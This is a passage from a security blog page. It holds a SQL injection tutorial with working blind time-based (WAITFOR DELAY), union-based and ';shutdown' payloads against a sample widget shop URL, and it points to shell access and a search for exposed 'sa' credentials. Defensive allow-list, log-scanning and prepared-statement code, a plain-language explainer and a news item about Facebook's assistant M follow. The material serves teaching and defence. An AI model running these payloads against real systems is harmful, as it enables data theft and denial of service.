then the potential really starts to open up.<br />
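The OrderBy value is a column name rather than a piece of data, so a placeholder cannot carry it; the usual fix is to map the request value onto an allow-list of column names. An added example (not part of the original article), using Python's sqlite3 and a constructed Widget table as stand-ins; the function names are illustrative.<br />

```python
import sqlite3

# Allow-list: lower-cased request value -> SQL fragment written by the developer.
SORT_COLUMNS = {"name": "Name", "id": "ID", "typeid": "TypeId"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_order_by(order_by, direction="asc"):
    """Return an ORDER BY clause assembled only from allow-listed fragments."""
    column = SORT_COLUMNS.get(str(order_by).strip().lower())
    way = SORT_DIRECTIONS.get(str(direction).strip().lower())
    if column is None or way is None:
        raise ValueError("unsupported sort option")
    return "ORDER BY " + column + " " + way


def list_widgets(db, order_by="Name", direction="asc"):
    # Only the looked-up constant reaches the SQL text; the request value never does.
    sql = "SELECT Name FROM Widget " + build_order_by(order_by, direction)
    return [row[0] for row in db.execute(sql)]


def list_widgets_bound(db, order_by):
    # A placeholder binds a value, not an identifier: this orders by a constant
    # string, so nothing is injected but the requested column is not used either.
    sql = "SELECT Name FROM Widget ORDER BY ?"
    return [row[0] for row in db.execute(sql, (order_by,))]


def make_db():
    """Constructed rows, inserted in an order that is not sorted by name."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Widget (ID INTEGER PRIMARY KEY, Name TEXT, TypeId INTEGER)")
    db.executemany("INSERT INTO Widget (Name, TypeId) VALUES (?, ?)",
                   [("Sprocket", 1), ("Cog", 2), ("Gear", 1)])
    return db


if __name__ == "__main__":
    db = make_db()
    print(list_widgets(db, "Name"))
    print(list_widgets(db, "name", "DESC"))
    try:
        list_widgets(db, "Name;SELECT DB_NAME()")  # the value from the URL above
    except ValueError as err:
        print("rejected:", err)
```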
Getting back to blind SQLi though, what we need to do now is find
another way to do the earlier boolean-based tests using a subsequent
statement and the way we can do that is to introduce a delay using
the WAITFOR DELAY syntax. Try this on for size:<br />
<pre class="code"><span style="color: teal;">Name</span><span style="color: grey;">;
</span><span style="color: blue;">IF</span><span style="color: grey;">(EXISTS(
</span><span style="color: blue;">select top </span>1 <span style="color: grey;">* </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">id</span><span style="color: grey;">=(
</span><span style="color: blue;">select top </span>1 <span style="color: teal;">id </span><span style="color: blue;">from </span><span style="color: grey;">(
</span><span style="color: blue;">select top </span>1 <span style="color: teal;">id </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">xtype</span><span style="color: grey;">=</span><span style="color: red;">'u' </span><span style="color: blue;">order by </span><span style="color: teal;">id
</span><span style="color: grey;">) </span><span style="color: teal;">sq </span><span style="color: blue;">order by </span><span style="color: teal;">id </span><span style="color: blue;">desc
</span><span style="color: grey;">) and </span><span style="color: magenta;">ascii</span><span style="color: grey;">(</span><span style="color: magenta;">lower</span><span style="color: grey;">(</span><span style="color: magenta;">substring</span><span style="color: grey;">(</span><span style="color: teal;">name</span><span style="color: grey;">, </span>1<span style="color: grey;">, </span>1<span style="color: grey;">))) > </span>109
<span style="color: grey;">))
</span><span style="color: blue;">WAITFOR DELAY </span><span style="color: red;">'0:0:5'
</span></pre>
This is only really a slight variation of the earlier examples in
that rather than changing the number of records returned by manipulating
the WHERE clause, it’s now just a totally new statement that looks for
the presence of a table at the end of sysobjects beginning with a letter
greater than “m” and if it exists, the query then takes a little nap
for 5 seconds. We’d still need to narrow down the ASCII character range
and we’d still need to move through each character of the table name <i>and</i>
we’d still need to look at other tables in sysobjects (plus of course
then look at syscolumns and then actually pull data out), but all of
that is entirely possible with a bit of time. 5 seconds may be longer
than needed or it may not be long enough, it all comes down to how
consistent the response times from the app are because ultimately this
is all designed to manipulate the observable behaviour which is how long
it takes between making a request and receiving a response.<br />
This attack – as with all the previous ones – could, of course, be
entirely automated as it’s nothing more than simple enumerations and
conditional logic. Of course it could end up taking a while but that’s a
relative term; if a normal request takes 1 second and half of the 5
attempts required to find the right character return true then you’re
looking at 17.5 seconds per character, say 10 chars in an average table
name is about 3 minutes a table then maybe 20 tables in a DB so call it
one hour and you’ve discovered every table name in the system. And
that’s if you’re doing all this in a single-threaded fashion.<br />
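From the defender's side, the same observable (a delay keyword in the request plus a response that took at least that long) is what to look for in the web server logs. The following is an added example, not code from the original article: the log format, the sample lines and the function names are constructed for illustration, and only the <code>WAITFOR DELAY</code> form shown above is matched.

```php
<?php
// Added example: flag time-delay probes in a web access log.
// Constructed log lines: "<time> <client> <method> <uri> <status> <time-taken-ms>".
const SAMPLE_LOG = <<<'LOG'
2015-08-20T10:00:01Z 198.51.100.4 GET /Widget/?id=1 200 950
2015-08-20T10:00:07Z 203.0.113.9 GET /Widget/?id=1;WAITFOR%20DELAY%20%270:0:5%27 200 6020
2015-08-20T10:00:09Z 203.0.113.9 GET /Widget/?id=1;WAITFOR%20DELAY%20%270:0:5%27 200 1010
2015-08-20T10:00:16Z 203.0.113.9 GET /Widget/?id=1;waitfor+delay+%270:0:5%27 200 6105
2015-08-20T10:00:20Z 192.0.2.33 GET /Widget/?id=2;WAITFOR%20DELAY%20%270:0:5%27 500 40
LOG;

// Returns the delay (in seconds) a request asks the database for, or null
// when the query string contains no WAITFOR DELAY '<h>:<m>[:<s>]' clause.
function requestedDelaySeconds(string $uri): ?int
{
    $query   = (string) strstr($uri, '?');
    // Decode %xx and '+', then collapse whitespace so spacing tricks do not matter.
    $decoded = preg_replace('/\s+/', ' ', urldecode($query));
    if (preg_match("/waitfor\s+delay\s*'(\d+):(\d+)(?::(\d+))?/i", $decoded, $m)) {
        return (int) $m[1] * 3600 + (int) $m[2] * 60 + (int) ($m[3] ?? 0);
    }
    return null;
}

// Counts, per client, how many requests carried a delay clause ("probes") and
// how many of those took at least as long as the requested delay ("delayed").
function summariseProbes(string $log): array
{
    $clients = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $fields = preg_split('/\s+/', trim($line));
        if (count($fields) !== 6) {
            continue; // not in the expected format
        }
        [, $client, , $uri, , $ms] = $fields;

        $delay = requestedDelaySeconds($uri);
        if ($delay === null) {
            continue;
        }
        if (!isset($clients[$client])) {
            $clients[$client] = ['probes' => 0, 'delayed' => 0];
        }
        $clients[$client]['probes']++;

        // A slow response means the injected statement ran. A fast one does NOT
        // clear the request: in the conditional form it only means the tested
        // condition was false, so any "delayed" hit marks the whole client.
        if ($delay > 0 && (int) $ms >= $delay * 1000) {
            $clients[$client]['delayed']++;
        }
    }
    return $clients;
}

foreach (summariseProbes(SAMPLE_LOG) as $client => $c) {
    $verdict = $c['delayed'] > 0
        ? 'delay executed: treat the parameter as injectable'
        : 'probe seen, no delay observed';
    printf("%-14s probes=%d delayed=%d  %s\n", $client, $c['probes'], $c['delayed'], $verdict);
}
```

Because response times vary, the same comparison is more reliable against a per-endpoint baseline than against the raw requested delay.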
<h4>
It doesn’t end there…</h4>
This is one of those topics with a heap of different angles, not
least of which is because there are so many different combinations of
database, app framework and web server not to mention a whole gamut of
defences such as web application firewalls. An example of where things
can get tricky is if you need to resort to a time-based attack yet the
database doesn’t support a delay feature, for example an Access database
(yes, some people actually do put these behind websites!) One approach
here is to use what’s referred to as <a href="http://technet.microsoft.com/en-us/library/cc512676.aspx">heavy queries</a> or in other words, queries which by their very nature will cause a response to be slow.<br />
The other thing worth mentioning about SQLi is that two really
significant factors play a role in the success an attacker has
exploiting the risk: The first is input sanitisation in terms of what
characters the app will actually accept and pass through to the
database. Often we’ll see very piecemeal approaches where, for example,
angle brackets and quotes are stripped but everything else is allowed.
When this starts happening the attacker needs to get creative in terms
of how they structure the query so that these roadblocks are avoided.
And that’s kind of the second point – the attacker’s SQL prowess is
vitally important. This goes well beyond just your average TSQL skills
of SELECT FROM, the proficient SQL injector understands numerous tricks
to both bypass the input sanitisation and select data from the system in
such a way that it can be retrieved via the web UI. For example, little
tricks like discovering a column type by using a query such as this:<br />
<u><span style="color: blue;">http://widgetshop.com/Widget/?id=1 union select sum(instock) from widget</span></u><br />
In this case, error-based injection will tell you exactly what
type the “InStock” column is when the error bubbles up to the UI (and no
error will mean it’s numeric):<br />
<img alt="Operand data type bit is invalid for sum operator." border="0" src="http://lh6.ggpht.com/-c9drKzJTJyA/Ufd7LQfJsdI/AAAAAAAAFj0/QWXqQVSNtxw/image3.png?imgmax=800" height="112" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="500" /><br />
Or once you’re totally fed up with the very presence of that damned
vulnerable site still being up there on the web, a bit of this:<br />
<u><span style="color: blue;">http://widgetshop.com/Widget/?id=1;shutdown</span></u><br />
But injection goes a lot further than just pulling data out via HTTP, for example there are <a href="https://www.pentesterlab.com/from_sqli_to_shell/from_sqli_to_shell.pdf">vectors that will grant the attacker shell on the machine</a>.
Or take another tangent – why bother trying to suck stuff out through
HTML when you might be able to just create a local SQL user and remotely
connect using SQL Server Management Studio over port 1433? But hang on –
you’d need the account the web app is connecting under to have the
privileges to actually create users in the database, right? Yep, and
plenty of them do, in fact you can find some of these <a href="https://www.google.com.au/search?num=100&safe=off&q=filetype%3Aconfig+inurl%3Aweb.config+inurl%3Aftp+%22user+id%3Dsa%22&oq=filetype%3Aconfig+inurl%3Aweb.config+inurl%3Aftp+%22user+id%3Dsa%22">just by searching Google</a> (of course there is no need for SQLi in these cases, assuming the SQL servers are publicly accessible).<br />
Lastly, if there’s any remaining doubt as to both the prevalence and
impact of SQLi flaws in today’s software, just last week there was <a href="http://www.computerworld.com/s/article/9241084/SQL_flaws_remain_an_Achilles_heel_for_IT_security_groups">news of what is arguably one of the largest hacking schemes to date</a> which (allegedly) resulted in losses of $300 million:<br />
<blockquote>
The indictment also suggests that the hackers, in most cases, did not
employ particularly sophisticated methods to gain initial entry into the
corporate networks. The papers show that in most cases, the breach was
made via SQL injection flaws -- a threat that has been thoroughly
documented and understood for well over a decade.</blockquote>
Perhaps SQLi is not quite as well understood as some people think.<br />
<br />
If you want to fix it in PHP, the following would work:<br />
<br />
<b>SQL injection prevention in PHP</b><br />
<br />
<div class="post-text" itemprop="text">
<b>Use prepared statements and parameterized queries.</b>
These are SQL statements that are sent to and parsed by the database
server separately from any parameters. This way it is impossible for an
attacker to inject malicious SQL.<br />
You basically have two options to achieve this:<br />
<ol>
<li>Using <a href="http://php.net/manual/en/book.pdo.php">PDO</a> (for any supported database driver):<br />
<pre class="lang-php prettyprint prettyprinted"><code><span class="pln">$stmt </span><span class="pun">=</span><span class="pln"> $pdo</span><span class="pun">-></span><span class="pln">prepare</span><span class="pun">(</span><span class="str">'SELECT * FROM employees WHERE name = :name'</span><span class="pun">);</span><span class="pln">
$stmt</span><span class="pun">-></span><span class="pln">execute</span><span class="pun">(</span><span class="pln">array</span><span class="pun">(</span><span class="str">'name'</span><span class="pln"> </span><span class="pun">=></span><span class="pln"> $name</span><span class="pun">));</span><span class="pln">
</span><span class="kwd">foreach</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$stmt </span><span class="kwd">as</span><span class="pln"> $row</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span><span class="pln">
</span><span class="com">// do something with $row</span><span class="pln">
</span><span class="pun">}</span></code></pre>
</li>
<li>Using <a href="http://php.net/manual/en/book.mysqli.php">MySQLi</a> (for MySQL):<br />
<pre class="lang-php prettyprint prettyprinted"><code><span class="pln">$stmt </span><span class="pun">=</span><span class="pln"> $dbConnection</span><span class="pun">-></span><span class="pln">prepare</span><span class="pun">(</span><span class="str">'SELECT * FROM employees WHERE name = ?'</span><span class="pun">);</span><span class="pln">
$stmt</span><span class="pun">-></span><span class="pln">bind_param</span><span class="pun">(</span><span class="str">'s'</span><span class="pun">,</span><span class="pln"> $name</span><span class="pun">);</span><span class="pln">
$stmt</span><span class="pun">-></span><span class="pln">execute</span><span class="pun">();</span><span class="pln">
$result </span><span class="pun">=</span><span class="pln"> $stmt</span><span class="pun">-></span><span class="pln">get_result</span><span class="pun">();</span><span class="pln">
</span><span class="kwd">while</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$row </span><span class="pun">=</span><span class="pln"> $result</span><span class="pun">-></span><span class="pln">fetch_assoc</span><span class="pun">())</span><span class="pln"> </span><span class="pun">{</span><span class="pln">
</span><span class="com">// do something with $row</span><span class="pln">
</span><span class="pun">}</span></code></pre>
</li>
</ol>
If you're connecting to a database other than MySQL, there is a driver-specific second option that you can refer to (e.g. <code>pg_prepare()</code> and <code>pg_execute()</code> for PostgreSQL). PDO is the universal option.<br />
<h2>
Correctly setting up the connection</h2>
Note that when using <code>PDO</code> to access a MySQL database <i>real</i> prepared statements are <b>not used by default</b>. To fix this you have to disable the emulation of prepared statements. An example of creating a connection using PDO is:<br />
<pre class="lang-php prettyprint prettyprinted"><code><span class="pln">$dbConnection </span><span class="pun">=</span><span class="pln"> </span><span class="kwd">new</span><span class="pln"> PDO</span><span class="pun">(</span><span class="str">'mysql:dbname=dbtest;host=127.0.0.1;charset=utf8'</span><span class="pun">,</span><span class="pln"> </span><span class="str">'user'</span><span class="pun">,</span><span class="pln"> </span><span class="str">'pass'</span><span class="pun">);</span><span class="pln">
$dbConnection</span><span class="pun">-></span><span class="pln">setAttribute</span><span class="pun">(</span><span class="pln">PDO</span><span class="pun">::</span><span class="pln">ATTR_EMULATE_PREPARES</span><span class="pun">,</span><span class="pln"> </span><span class="kwd">false</span><span class="pun">);</span><span class="pln">
$dbConnection</span><span class="pun">-></span><span class="pln">setAttribute</span><span class="pun">(</span><span class="pln">PDO</span><span class="pun">::</span><span class="pln">ATTR_ERRMODE</span><span class="pun">,</span><span class="pln"> PDO</span><span class="pun">::</span><span class="pln">ERRMODE_EXCEPTION</span><span class="pun">);</span></code></pre>
In the above example the error mode isn't strictly necessary, <b>but it is advised to add it</b>. This way the script will not stop with a <code>Fatal Error</code> when something goes wrong. And it gives the developer the chance to <code>catch</code> any error(s) which are <code>throw</code>n as <code>PDOException</code>s.<br />
What is <b>mandatory</b> however is the first <code>setAttribute()</code> line, which tells PDO to disable emulated prepared statements and use <i>real</i>
prepared statements. This makes sure the statement and the values
aren't parsed by PHP before sending it to the MySQL server (giving a
possible attacker no chance to inject malicious SQL).<br />
Although you can set the <code>charset</code> in the options of the constructor, it's important to note that 'older' versions of PHP (< 5.3.6) <a href="http://php.net/manual/en/ref.pdo-mysql.connection.php">silently ignored the charset parameter</a> in the DSN.<br />
<h2>
Explanation</h2>
What happens is that the SQL statement you pass to <code>prepare</code> is parsed and compiled by the database server. By specifying parameters (either a <code>?</code> or a named parameter like <code>:name</code> in the example above) you tell the database engine where you want to filter on. Then when you call <code>execute</code>, the prepared statement is combined with the parameter values you specify. <br />
The important thing here is that the parameter values are combined
with the compiled statement, not an SQL string. SQL injection works by
tricking the script into including malicious strings when it creates SQL
to send to the database. So by sending the actual SQL separately from
the parameters, you limit the risk of ending up with something you
didn't intend. Any parameters you send when using a prepared statement
will just be treated as strings (although the database engine may do
some optimization so parameters may end up as numbers too, of course).
In the example above, if the <code>$name</code> variable contains <code>'Sarah'; DELETE FROM employees</code> the result would simply be a search for the string <code>"'Sarah'; DELETE FROM employees"</code>, and you will not end up with <a href="http://xkcd.com/327/">an empty table</a>.<br />
Another benefit with using prepared statements is that if you execute
the same statement many times in the same session it will only be
parsed and compiled once, giving you some speed gains.<br />
Oh, and since you asked about how to do it for an insert, here's an example (using PDO):<br />
<pre class="lang-php prettyprint prettyprinted"><code><span class="pln">$preparedStatement </span><span class="pun">=</span><span class="pln"> $db</span><span class="pun">-></span><span class="pln">prepare</span><span class="pun">(</span><span class="str">'INSERT INTO table (column) VALUES (:column)'</span><span class="pun">);</span><span class="pln">
$preparedStatement</span><span class="pun">-></span><span class="pln">execute</span><span class="pun">(</span><span class="pln">array</span><span class="pun">(</span><span class="str">'column'</span><span class="pln"> </span><span class="pun">=></span><span class="pln"> $unsafeValue</span><span class="pun">));</span></code></pre>
<h2>
Can Prepared Statements Be Used For Dynamic Queries?</h2>
While you can still use prepared statements for the query parameters,
the structure of the dynamic query itself cannot be parametrized and
certain query features (e.g. <code>LIMIT $start, $number</code>) cannot be parametrized.<br />
For example, this will <b>not work</b>:<br />
<pre class="default prettyprint prettyprinted"><code><span class="pln">$stmt </span><span class="pun">=</span><span class="pln"> $pdo</span><span class="pun">-></span><span class="pln">prepare</span><span class="pun">(</span><span class="str">'SELECT * FROM employees ORDER BY name ASC LIMIT ?, ?'</span><span class="pun">);</span><span class="pln"> </span><span class="com">// Bad query</span><span class="pln">
$stmt</span><span class="pun">-></span><span class="pln">execute</span><span class="pun">(</span><span class="pln">array</span><span class="pun">(</span><span class="lit">0</span><span class="pun">,</span><span class="pln"> </span><span class="lit">30</span><span class="pun">));</span></code></pre>
For these specific scenarios, the best thing to do is use a whitelist
filter that restricts the possible values or the possible characters.<br />
<pre class="default prettyprint prettyprinted"><code><span class="com">// Value whitelist</span><span class="pln">
</span><span class="com">// $dir can only be 'DESC' or 'ASC'</span><span class="pln">
$dir </span><span class="pun">=</span><span class="pln"> </span><span class="pun">!</span><span class="pln">empty</span><span class="pun">(</span><span class="pln">$direction</span><span class="pun">)</span><span class="pln"> </span><span class="pun">?</span><span class="pln"> </span><span class="str">'DESC'</span><span class="pln"> </span><span class="pun">:</span><span class="pln"> </span><span class="str">'ASC'</span><span class="pun">;</span><span class="pln">
</span><span class="com">// Character set whitelist</span><span class="pln">
</span><span class="com">// $offset will never contain a non-numeric character</span><span class="pln">
$offset </span><span class="pun">=</span><span class="pln"> preg_replace</span><span class="pun">(</span><span class="str">'/[^0-9]+/'</span><span class="pun">,</span><span class="pln"> </span><span class="str">''</span><span class="pun">,</span><span class="pln"> $offset</span><span class="pun">);</span><span class="pln">
</span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">empty</span><span class="pun">(</span><span class="pln">$offset</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span><span class="pln">
$offset </span><span class="pun">=</span><span class="pln"> </span><span class="lit">0</span><span class="pun">;</span><span class="pln">
</span><span class="pun">}</span><span class="pln">
</span><span class="com">// Explicit data types</span><span class="pln">
</span><span class="com">// $number will always be an integer. We use a binary AND operation</span><span class="pln">
</span><span class="com">// ($number & PHP_INT_MAX) to prevent integer overflows from creating</span><span class="pln">
</span><span class="com">// invalid characters from alternative notation.</span><span class="pln">
$number </span><span class="pun">=</span><span class="pln"> </span><span class="pun">(</span><span class="kwd">int</span><span class="pun">)</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$number </span><span class="pun"><</span><span class="pln"> </span><span class="lit">0</span><span class="pln"> </span><span class="pun">?</span><span class="pln"> </span><span class="lit">1</span><span class="pln"> </span><span class="pun">:</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$number </span><span class="pun">&</span><span class="pln"> PHP_INT_MAX</span><span class="pun">));</span><span class="pln">
$stmt </span><span class="pun">=</span><span class="pln"> $pdo</span><span class="pun">-></span><span class="pln">prepare</span><span class="pun">(</span><span class="pln">
</span><span class="str">'SELECT * FROM employees ORDER BY name '</span><span class="pun">.</span><span class="pln">$dir</span><span class="pun">.</span><span class="str">' LIMIT '</span><span class="pun">.</span><span class="pln">$offset</span><span class="pun">.</span><span class="str">', '</span><span class="pun">.</span><span class="pln">$number
</span><span class="pun">);</span></code></pre>
</div>
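The pieces above put together, as an added example that is not part of the original answer: a concatenated lookup beside its prepared form, fed the <code>'Sarah'; DELETE FROM employees</code> value from the explanation, and a dynamic <code>ORDER BY</code> / <code>LIMIT</code> query built from a whitelist. It assumes the <code>pdo_sqlite</code> driver so it runs without a server; the <code>salary</code> column, the sample rows and all function names are constructed, and <code>LIMIT</code>/<code>OFFSET</code> are bound explicitly as integers with <code>bindValue()</code> as an alternative to interpolating the cleaned numbers.

```php
<?php
// Added example, not from the original answer. Runs on an in-memory SQLite
// database through PDO (pdo_sqlite); the rows are constructed sample data.
// On MySQL, also disable emulated prepares as described above.

function makeDb(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE employees (id INTEGER PRIMARY KEY, name TEXT, salary INTEGER)');
    $insert = $pdo->prepare('INSERT INTO employees (name, salary) VALUES (:name, :salary)');
    foreach ([['Sarah', 5200], ['Amir', 4800], ['Chen', 6100], ["O'Brien", 4500]] as [$name, $salary]) {
        $insert->execute(['name' => $name, 'salary' => $salary]);
    }
    return $pdo;
}

// BEFORE: the value becomes part of the SQL text, so a quote inside it
// changes how the statement is parsed.
function findByNameConcatenated(PDO $pdo, string $name): array
{
    return $pdo->query("SELECT name FROM employees WHERE name = '$name'")
               ->fetchAll(PDO::FETCH_COLUMN);
}

// AFTER: the statement text is fixed; the value travels separately as data.
function findByName(PDO $pdo, string $name): array
{
    $stmt = $pdo->prepare('SELECT name FROM employees WHERE name = :name');
    $stmt->execute(['name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Identifiers and keywords cannot be bound, so they are picked from fixed
// lists; the user-supplied string itself never reaches the SQL text.
const SORT_COLUMNS = ['id' => 'id', 'name' => 'name', 'salary' => 'salary'];

function listEmployees(PDO $pdo, string $sort, string $dir, $limit, $offset): array
{
    $column    = SORT_COLUMNS[$sort] ?? 'name';
    $direction = strtoupper($dir) === 'DESC' ? 'DESC' : 'ASC';

    // LIMIT/OFFSET are values: validate as integers in a sane range, fall
    // back to defaults otherwise, then bind them as integers.
    $limit  = filter_var($limit, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1, 'max_range' => 100]]);
    $offset = filter_var($offset, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($limit === false) {
        $limit = 30;
    }
    if ($offset === false) {
        $offset = 0;
    }

    $stmt = $pdo->prepare(
        "SELECT name, salary FROM employees ORDER BY $column $direction LIMIT :limit OFFSET :offset"
    );
    $stmt->bindValue(':limit', $limit, PDO::PARAM_INT);
    $stmt->bindValue(':offset', $offset, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$pdo = makeDb();

// A plain name, a legitimate name containing a quote, and the value quoted
// in the explanation above.
$inputs = ['Sarah', "O'Brien", "'Sarah'; DELETE FROM employees"];
foreach ($inputs as $input) {
    try {
        $before = count(findByNameConcatenated($pdo, $input)) . ' row(s)';
    } catch (PDOException $e) {
        $before = 'SQL error'; // the input altered the statement's structure
    }
    printf("%-32s concatenated: %-10s bound: %d row(s)\n",
        $input, $before, count(findByName($pdo, $input)));
}
printf("rows in table afterwards: %d\n",
    $pdo->query('SELECT COUNT(*) FROM employees')->fetchColumn());

// Accepted sort request, then one where every field is out of policy and
// silently falls back to the defaults.
print_r(array_column(listEmployees($pdo, 'salary', 'desc', '2', '0'), 'name'));
print_r(array_column(listEmployees($pdo, 'salary; DELETE FROM employees', 'sideways', '9999', '-1'), 'name'));
```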
<br />
<br />
<b>Hope it helps..</b><br />
<br />
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com19tag:blogger.com,1999:blog-4509349481580895365.post-31132873601080691992015-08-28T11:47:00.001+05:302015-08-28T11:47:28.471+05:30What is sql injection ?<div dir="ltr" style="text-align: left;" trbidi="on">
Hi friends<br />
<br />
Today I am going to share an interesting article found at dmz: what SQL injection is and how it is exploited.<br />
<br />
Technically speaking :<br />
<br />
<span class="_Tgc"><b>SQL injection</b> is a code <b>injection</b> technique, used to attack data-driven applications, in which malicious <b>SQL</b> statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).</span><br />
<br />
<span class="_Tgc">Now what about a layman who doesn't understand anything about SQL injection?</span><br />
<br />
<span class="_Tgc">Polynomial of dmz put it quite well:</span><br />
<br />
<div class="post-text" itemprop="text">
The way I demonstrate it to complete non-techies is with a simple analogy.<br />
Imagine you're a robot in a warehouse full of boxes. Your job is to
fetch a box from somewhere in the warehouse, and put it on the conveyor
belt. Robots need to be told what to do, so your programmer has given
you a set of instructions on a paper form, which people can fill out and
hand to you.<br />
The form looks like this:<br />
<blockquote>
Fetch item number ____ from section ____ of rack number ____, and place it on the conveyor belt.<br />
</blockquote>
A normal request might look like this:<br />
<blockquote>
Fetch item number <strong>1234</strong> from section <strong>B2</strong> of rack number <strong>12</strong>, and place it on the conveyor belt.<br />
</blockquote>
The values in bold (1234, B2, and 12) were provided by the person
issuing the request. You're a robot, so you do what you're told: you
drive up to rack 12, go down it until you reach section B2, and grab
item 1234. You then drive back to the conveyor belt and drop the item
onto it.<br />
But what if a user put something other than normal values into the form? What if the user added instructions into them?<br />
<blockquote>
Fetch item number <strong>1234</strong> from section <strong>B2</strong> of rack number <strong>12, and throw it out the window. Then go back to your desk and ignore the rest of this form.</strong> and place it on the conveyor belt.<br />
</blockquote>
Again, the parts in bold were provided by the person issuing the
request. Since you're a robot, you do exactly what the user just told
you to do. You drive over to rack 12, grab item 1234 from section B2,
and throw it out of the window. Since the instructions also tell you to
ignore the last part of the message, the "and place it on the conveyor
belt" bit is ignored.<br />
This technique is called "injection", and it's possible due to the
way that the instructions are handled - the robot can't tell the
difference between <em>instructions</em> and <em>data</em>, i.e. the actions it has to perform, and the things it has to do those actions on.<br />
SQL is a special language used to tell a database what to do, in a
similar way to how we told the robot what to do. In SQL injection, we
run into exactly the same problem - a query (a set of instructions)
might have parameters (data) inserted into it that end up being
interpreted as instructions, causing it to malfunction. A malicious user
might exploit this by telling the database to return every user's
details, which is obviously not good!<br />
In order to avoid this problem, we must separate the instructions and
data in a way that the database (or robot) can easily distinguish. This
is usually done by sending them separately. So, in the case of the
robot, it would read the blank form containing the instructions,
identify where the parameters (i.e. the blank spaces) are, and store it.
A user can then walk up and say "1234, B2, 12" and the robot will apply
those values to the instructions, without allowing them to be
interpreted as instructions themselves. In SQL, this technique is known
as parameterised queries.<br />
In the case of the "evil" parameter we gave to the robot, he would now raise a mechanical eyebrow quizzically and say<br />
<blockquote>
Error: Cannot find rack number "<strong>12, and throw it out the window. Then go back to your desk and ignore the rest of this form.</strong>" - are you sure this is a valid input?<br />
</blockquote>
Success! We've stopped the robot's "glitch".<br />
<br />
Another explanation would be:<br />
<br />
You are about to go to the bank to perform a transaction on behalf of
your boss. Your boss gave you an envelope with instructions for the
cashier.<br />
The instructions read:<br />
<pre><code>Write the balance for account with number 8772344 on this paper.
Signed,
Boss
</code></pre>
You leave the envelope out of your sight for a few minutes while you
go to the bathroom. A thief opens the envelope and adds above the
signature: "Also transfer $500 from account 8772344 to another account
with number 12747583.".<br />
Now the full message reads:<br />
<pre><code>Write the balance for account with number 8772344 on this paper.
Also transfer $500 from account 8772344 to another account with number 12747583.
Signed,
Boss
</code></pre>
The cashier checks your identification and verifies that you are an
authorized person for the account in question and follows the
instructions in the letter.<br />
Your boss is the legitimate program code.<br />
You are the program code and database driver that is delivering the SQL code to the database.<br />
The letter is the SQL code that is being passed to the database.<br />
The thief is the attacker.<br />
The cashier is the database.<br />
The identification is typically a login and password to the database.<br />
<br />
That clarifies the basics of SQL injection. Hoping for your comments.<br />
<br />
<br />
<br />
</div>
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com3tag:blogger.com,1999:blog-4509349481580895365.post-36367353638404257222015-08-27T19:53:00.001+05:302015-08-27T19:53:56.268+05:30 Facebook’s virtual assistant "M"<div dir="ltr" style="text-align: left;" trbidi="on">
Facebook is the latest technology company to offer users a virtual assistant service.<br />
Facebook is testing the artificial intelligence-powered service,
called simply "M," inside its messaging app, Messenger, with some users.<br />
David Marcus, the head of messaging products at the Menlo Park,
California company, says in a Facebook post that M can do things like
buy items for you, get gifts delivered and book restaurant reservations
or appointments.<br />
Apple's Siri is the most well-known virtual assistant. Microsoft and Amazon also have options.<br />
Marcus says M aims to do more than other digital assistants on the market by completing tasks on the user's behalf.<br />
With more than 700 million users, Messenger is one of the world's most popular messaging apps.<br />
<br />
<a class=" u-underline" data-component="auto-linked-tag" data-link-name="auto-linked-tag" href="http://www.theguardian.com/technology/facebook">Facebook</a>
is launching a virtual assistant that combines artificial intelligence
(AI) technology with a team of human helpers, to compete with services
such as Apple’s Siri, Google Now and Microsoft’s Cortana.<br />
Facebook M will sit within the social network’s Facebook Messenger
app, with people interacting with it using messages as if it were one of
their friends.<br />
“M is a personal digital assistant inside of Messenger that completes
tasks and finds information on your behalf. It’s powered by artificial
intelligence that’s trained and supervised by people,” explained
Facebook’s messaging boss David Marcus, <a class=" u-underline" data-component="in-body-link" data-link-name="in body link" href="https://www.facebook.com/Davemarcus/posts/10156070660595195">in a post on the social network</a>.<br />
“Unlike other AI-based services in the market, M can actually
complete tasks on your behalf. It can purchase items, get gifts
delivered to your loved ones, book restaurants, travel arrangements,
appointments and way more.”<br />
Facebook M is currently in tests internally and with a few Facebook
users, with no confirmed launch date to roll it out to the 700 million
users of Messenger.<br />
Screenshots published by Marcus show sample queries including “Can
you help me order flowers for my mom’s birthday?”; “Where’s the best
place to go hiking in the Bay Area?”; and “Is there a dog-friendly beach
nearby?”<br />
<br />
<br />
<div class="u-responsive-ratio" style="padding-bottom: 72.42%;">
<img alt="Example queries from Facebook M." class="gu-image" itemprop="contentUrl" src="https://i.guim.co.uk/img/static/sys-images/Guardian/Pix/pictures/2015/8/27/1440662738568/70844cee-3fb6-4413-bfe2-cdc0f8cdf240-620x449.jpeg?w=300&q=85&auto=format&sharp=10&s=1ca6f2890339baa63b408862d9cab000" /> <br />Facebook M is part of a bigger, ambitious strategy for Messenger to become more than just an app for chatting to friends.<br />
It won’t take long for Messenger’s users to realize M can accomplish
